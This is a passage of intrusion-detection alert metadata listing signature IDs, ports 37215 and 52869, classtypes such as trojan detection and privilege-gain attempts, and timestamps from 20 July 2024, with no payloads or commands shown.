                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.270124
                      SID:2025132
                      Source Port:48982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.062924
                      SID:2829579
                      Source Port:34058
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.052134
                      SID:2027339
                      Source Port:56442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.720163
                      SID:2027339
                      Source Port:43668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.799314
                      SID:2831300
                      Source Port:48034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.468656
                      SID:2831300
                      Source Port:34264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.775023
                      SID:2829579
                      Source Port:54518
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.575243
                      SID:2831300
                      Source Port:55562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.220682
                      SID:2835222
                      Source Port:57520
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.994984
                      SID:2027339
                      Source Port:33976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.861533
                      SID:2027339
                      Source Port:37288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.983796
                      SID:2027339
                      Source Port:50040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.245639
                      SID:2025132
                      Source Port:38408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:14.553922
                      SID:2025132
                      Source Port:35856
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.858199
                      SID:2835222
                      Source Port:52850
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.125782
                      SID:2835222
                      Source Port:42778
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.081824
                      SID:2025132
                      Source Port:36852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:29.727366
                      SID:2025132
                      Source Port:33098
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:24.853073
                      SID:2025132
                      Source Port:56406
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.385438
                      SID:2025132
                      Source Port:40696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:15.011261
                      SID:2027339
                      Source Port:57864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.449958
                      SID:2027339
                      Source Port:60978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.306429
                      SID:2027339
                      Source Port:48540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.094598
                      SID:2027339
                      Source Port:56784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.359038
                      SID:2027339
                      Source Port:48904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.328640
                      SID:2835222
                      Source Port:37160
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.965851
                      SID:2025132
                      Source Port:43644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.540063
                      SID:2027339
                      Source Port:43376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:25.634766
                      SID:2027339
                      Source Port:50236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:09.612324
                      SID:2831300
                      Source Port:37006
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.508900
                      SID:2027339
                      Source Port:58842
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.442577
                      SID:2027339
                      Source Port:56962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.162612
                      SID:2831300
                      Source Port:50784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:31.320054
                      SID:2027339
                      Source Port:36082
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.610532
                      SID:2025132
                      Source Port:55826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.571555
                      SID:2829579
                      Source Port:33358
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.133658
                      SID:2027339
                      Source Port:57888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.809291
                      SID:2027339
                      Source Port:40338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.468656
                      SID:2831300
                      Source Port:36248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.559359
                      SID:2835222
                      Source Port:54432
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.306158
                      SID:2025132
                      Source Port:60052
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.802006
                      SID:2027339
                      Source Port:54038
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.652423
                      SID:2829579
                      Source Port:48094
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.919151
                      SID:2027339
                      Source Port:56030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.047547
                      SID:2829579
                      Source Port:40616
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.833027
                      SID:2829579
                      Source Port:56802
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.330840
                      SID:2831300
                      Source Port:36942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.798839
                      SID:2027339
                      Source Port:48820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.477052
                      SID:2027339
                      Source Port:41058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.205142
                      SID:2831300
                      Source Port:50352
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.325773
                      SID:2829579
                      Source Port:58860
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.653497
                      SID:2025132
                      Source Port:33366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.525575
                      SID:2027339
                      Source Port:40400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.627537
                      SID:2831300
                      Source Port:59274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.005302
                      SID:2025132
                      Source Port:49570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.062924
                      SID:2829579
                      Source Port:43510
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.536999
                      SID:2831300
                      Source Port:33872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.581538
                      SID:2829579
                      Source Port:56550
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.201580
                      SID:2025132
                      Source Port:55266
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.433779
                      SID:2027339
                      Source Port:54018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.066947
                      SID:2829579
                      Source Port:42830
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.884914
                      SID:2025132
                      Source Port:45454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.830570
                      SID:2829579
                      Source Port:56116
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.841499
                      SID:2829579
                      Source Port:56286
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.109755
                      SID:2027339
                      Source Port:45590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.852857
                      SID:2835222
                      Source Port:44544
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.257816
                      SID:2835222
                      Source Port:56776
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.930873
                      SID:2025132
                      Source Port:50636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.046089
                      SID:2025132
                      Source Port:41954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.083085
                      SID:2835222
                      Source Port:40636
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.677347
                      SID:2027339
                      Source Port:33756
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.765891
                      SID:2829579
                      Source Port:42848
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.054227
                      SID:2829579
                      Source Port:51574
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.834038
                      SID:2027339
                      Source Port:37122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.736310
                      SID:2027339
                      Source Port:45114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.795527
                      SID:2835222
                      Source Port:46106
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.207276
                      SID:2025132
                      Source Port:49888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.834038
                      SID:2831300
                      Source Port:60472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.051106
                      SID:2025132
                      Source Port:37834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.104584
                      SID:2027339
                      Source Port:33780
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.131789
                      SID:2835222
                      Source Port:45536
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.555898
                      SID:2835222
                      Source Port:59208
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.209942
                      SID:2027339
                      Source Port:32808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.426771
                      SID:2027339
                      Source Port:56460
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.119639
                      SID:2835222
                      Source Port:54228
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.795527
                      SID:2829579
                      Source Port:60610
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.086079
                      SID:2835222
                      Source Port:46286
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.712041
                      SID:2027339
                      Source Port:39532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.603798
                      SID:2025132
                      Source Port:43426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.974933
                      SID:2027339
                      Source Port:35792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.180750
                      SID:2025132
                      Source Port:60650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.756759
                      SID:2025132
                      Source Port:36960
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.468494
                      SID:2027339
                      Source Port:34336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.342606
                      SID:2831300
                      Source Port:58668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.442542
                      SID:2027339
                      Source Port:43822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.544209
                      SID:2027339
                      Source Port:42810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.830570
                      SID:2829579
                      Source Port:43494
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.141369
                      SID:2027339
                      Source Port:53240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.328920
                      SID:2027339
                      Source Port:38156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.167898
                      SID:2027339
                      Source Port:38302
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.742051
                      SID:2027339
                      Source Port:58674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.245589
                      SID:2835222
                      Source Port:34320
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.465385
                      SID:2835222
                      Source Port:40416
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.997188
                      SID:2831300
                      Source Port:40842
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.125247
                      SID:2025132
                      Source Port:41520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.204161
                      SID:2027339
                      Source Port:54652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.421312
                      SID:2835222
                      Source Port:59226
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.268005
                      SID:2025132
                      Source Port:52002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:42.331305
                      SID:2831300
                      Source Port:42116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.953817
                      SID:2835222
                      Source Port:32968
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.455250
                      SID:2027339
                      Source Port:46054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.515352
                      SID:2829579
                      Source Port:38848
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.080862
                      SID:2025132
                      Source Port:50074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.766400
                      SID:2027339
                      Source Port:34136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.763323
                      SID:2835222
                      Source Port:32850
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:03.190386
                      SID:2027339
                      Source Port:41588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.575886
                      SID:2027339
                      Source Port:41920
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.841404
                      SID:2025132
                      Source Port:38638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.528872
                      SID:2829579
                      Source Port:41582
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.954116
                      SID:2831300
                      Source Port:46216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.499861
                      SID:2831300
                      Source Port:51130
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:34.305255
                      SID:2027339
                      Source Port:51982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.201041
                      SID:2025132
                      Source Port:50716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.245589
                      SID:2829579
                      Source Port:36064
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.906267
                      SID:2025132
                      Source Port:35052
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:32.610183
                      SID:2025132
                      Source Port:46410
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.453957
                      SID:2829579
                      Source Port:54074
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.045135
                      SID:2025132
                      Source Port:49058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.556779
                      SID:2831300
                      Source Port:50522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:15.790678
                      SID:2025132
                      Source Port:55368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.922674
                      SID:2025132
                      Source Port:46298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.594101
                      SID:2831300
                      Source Port:34084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:05.658836
                      SID:2027339
                      Source Port:39428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.290200
                      SID:2027339
                      Source Port:48400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.736347
                      SID:2027339
                      Source Port:33874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:55.877930
                      SID:2829579
                      Source Port:55950
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.435096
                      SID:2835222
                      Source Port:44508
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.948716
                      SID:2027339
                      Source Port:42322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.066947
                      SID:2835222
                      Source Port:41124
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.429320
                      SID:2027339
                      Source Port:53970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.476247
                      SID:2829579
                      Source Port:40210
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:44.280800
                      SID:2027339
                      Source Port:44334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.945198
                      SID:2829579
                      Source Port:42822
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.612988
                      SID:2831300
                      Source Port:47986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:08.217282
                      SID:2027339
                      Source Port:47058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.385927
                      SID:2027339
                      Source Port:48886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.746219
                      SID:2831300
                      Source Port:52780
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.587244
                      SID:2027339
                      Source Port:47624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.789977
                      SID:2027339
                      Source Port:43260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.858951
                      SID:2027339
                      Source Port:40768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.722490
                      SID:2027339
                      Source Port:53672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.094268
                      SID:2027339
                      Source Port:42610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.645534
                      SID:2027339
                      Source Port:53064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.322260
                      SID:2027339
                      Source Port:39694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.433285
                      SID:2831300
                      Source Port:37022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.893558
                      SID:2831300
                      Source Port:59628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.287009
                      SID:2027339
                      Source Port:50638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.455022
                      SID:2027339
                      Source Port:46040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.829338
                      SID:2829579
                      Source Port:32804
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.435096
                      SID:2835222
                      Source Port:43250
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.698150
                      SID:2025132
                      Source Port:53356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:09.635095
                      SID:2027339
                      Source Port:60604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.540920
                      SID:2025132
                      Source Port:34906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.811976
                      SID:2025132
                      Source Port:42296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:04.523323
                      SID:2027339
                      Source Port:46746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.107642
                      SID:2027339
                      Source Port:43200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:50.419958
                      SID:2027339
                      Source Port:50808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.502843
                      SID:2027339
                      Source Port:60896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.081357
                      SID:2027339
                      Source Port:59646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.407221
                      SID:2025132
                      Source Port:35942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:20.738854
                      SID:2027339
                      Source Port:42966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.188277
                      SID:2829579
                      Source Port:33318
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.559359
                      SID:2829579
                      Source Port:59544
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.269499
                      SID:2831300
                      Source Port:47408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:17.529212
                      SID:2027339
                      Source Port:55104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.322897
                      SID:2027339
                      Source Port:49074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.015672
                      SID:2027339
                      Source Port:39164
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.458812
                      SID:2027339
                      Source Port:57528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.328888
                      SID:2829579
                      Source Port:32874
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.788274
                      SID:2829579
                      Source Port:58314
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
